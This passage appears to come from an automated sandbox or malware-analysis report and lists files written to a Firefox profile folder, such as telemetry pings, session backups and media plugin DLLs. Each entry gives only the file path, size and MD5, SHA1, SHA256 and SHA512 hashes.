SHA5120122d151a3142bb7ddf0d76a7b46ca28532830542968a4018dc5cda8b00eccd0db9b8195d1830e70202514b09a8701a62dd73e9a0489d90450f1e1d6dedc42e8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\AlternateServices.bin
Filesize12KB
MD5fd9de7b9cfd31252e53842807939835b
SHA1de4cbc9412899f5d969f1a69c71049342403db49
SHA2564298537a25af075cb10b73f6ff9669756ca2ac967e572e98b51451bc2eb80616
SHA5122b1254f2d1b773c6b8d034b035850bc1c9593d9a24ef2089efeea28c21799c7ce8648f9f4281804c48333b998349bdb28cf947e088cc4cd971b243ecfcc72819
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD580fbd95a165e211af3b1628e62a20aee
SHA19a951366d5d1dc69daf318e3ad459a000ed2f72f
SHA256167edc479be461887b6e6d8f3f1512cd499367c7fc17f041e9324033cacfb2b9
SHA512b81c37a0873a0ee895fb141e60ecf1c1245e094a24fb7aeefbd675b08ac917fedbddd33d3328647b63eadb602c6272d892efa9ff3499e080f48707a2da2f3179
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5af7f2f23af43f8c7fbb8c5186113fa0c
SHA100078bc10c52d0b3304fed9ae82da359bc542475
SHA2569f76c4125f8f09603965f35da216c368222587caaa6322d0280fdca6064b8357
SHA5123a596f35ee743af9568666a822b07d43eb00169f3f03fe253873cfaca279681c485dba29505dfc390841f39f2d7f57f4c02424d0db6fac8b0aaa3fe667e3df63
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD58168174f76dd892bb3fc28b8557401f1
SHA14afcad07c901dc90115b95196f4ca915fc340529
SHA256d7086b4a856f33701eb705fdb7995d3b1b713e40b4ef09a017640c62de1ac113
SHA512ed060937c742fc3501eeeb1b4a6741c9518acca34bc4ef815c53a32fa16e6899ccf7a27be8f508194e8a79dc5096eac556bca78e3d7f653bfcfe1880e32266fd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\109ebbf2-c959-46c0-9dce-57ab69297c1a
Filesize982B
MD56122274942c316f4c28b56adba70eb41
SHA18babbf09fda8ca48cdd139236fc8a939d23b0b49
SHA256680c640ab6b7d59682b8cd9a24e2bad6805845519ada87cec909fd95acd616dc
SHA51229a58ebb574e03eada27a272a68c9e82504a2def1da22553acd7578daf7443cad34815ccbbeb7eb9044debe454fe399bc1bfb6b52153758c3546609c757a62cf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\51f4caa7-2bd1-4ec3-8004-1811418c29f2
Filesize27KB
MD537fc5355273ca6d96ec2dc2cbc521570
SHA1e6c588bb45c1b54205c2991f35508876a2374d26
SHA256173fadcdf75446cef5507c8261832059eeff6eedd3597069d50a328610e8e868
SHA5122350bc64e2ebb7dc1556f812fad1deab028eaf1040ccf65f062776caa60514d8ce55287d77ee0998aec5259e19686033fc43d537a000a2425a90ab2a59e2b775
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\e23b16cf-7dd7-449e-a198-4a473e8f4033
Filesize671B
MD5b111c8b757c16e6d177f3d310fc1f461
SHA14d8db094d53be5910dc26a42330f6dcb63ad7cb6
SHA256e282f0a3a3765d48fd695d535415449336bb812f260bbace69eccd9e12a081b8
SHA512f1d12d1a1da4ebb99e40d18b121f72600abe7bb77eb8ea6413a54893919c36c75682460188a3b7fa1f9fd3dd291b143bc3cc07c91e6d01f8f541a93c90afed55
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
12KB
MD54b03546a216a8974455c8101dc7d26a7
SHA1ab052b6bc2506cf74bdf6c1dea0926602a578d22
SHA2564dd67f19d9b5b4ca845ce420cafe5011330276228b20cb65ea84cd989ba0264d
SHA512b0a05bc22b2167870949764b940da8bce45c5bd31a71ec8d9285c84b4ccda5898eac5b4ba0f072a3959b39ef20bc2811d4deb07b33ebc9d3f78424de25c44881
-
Filesize
11KB
MD56d5e0935a4489aa29b172a6b1d3ee009
SHA12172f0ff0973edb9ec426d0b73b73577aaf08ee3
SHA2561c1f91470c1a9c57357f6b2c30ea43858ee3120408d3b094519544f801c84639
SHA512635385b91088007eb8eeac4fff79752b8abbfe4da471e0a08e847a2cc3e5da9782e6b2b2a28e7cbe3cebedf0d1898e6e6e1782e1e83d1875f7c4188b69de54a7
-
Filesize
11KB
MD542d264a96957a61c3c49e3465317e8d5
SHA13fb4550a895d7b273eac54f88be752b6906e1558
SHA256b6cbb9f1c12bad5fb701e161ce0fb4e4e05a9ca3b830645ac199cff9cecd06b9
SHA512ba5cd4b192d2378fa37238a7ca77c667c87ed48dc76b117274d475b341d25cf75e07c22b7514e4740868073c7df15a28f16da49ccdfaa97155a019877e4aff09
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\sessionstore-backups\recovery.baklz4
Filesize3KB
MD5d328cfb915782830c3be2dcc808b652c
SHA1c46cba55e09527952e0358f48243df23d0046b0b
SHA25623eace026d3ef2f536df9f17aaae7a63b915bf4e55b2c239808d3726b9328039
SHA512ca88a5dcacf2e03444c7de6b1fdb39f998bee760fc0431d034a57de860ba60c20840f79a2dbbd337ee7b312e79f2951768ff57f068bd8424924d90730b3b082a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\sessionstore-backups\recovery.baklz4
Filesize4KB
MD5b3b0e0449805bb6a5f260b81c3c172b1
SHA1983aadf04b69a81268f0c2917fe024d7c7d69af5
SHA256cd2603ac2215af7b38b81eb80f71402f8e0969cad02273501aaa1f5f6415a103
SHA51287dd1dd422bf1f5c7eb51887867f08041630f097a97ab5c74464ce07ef65fef8d8ecd68522af9fdfb47183f7ca4195b269b7634087fe774c0498ee100bb840c9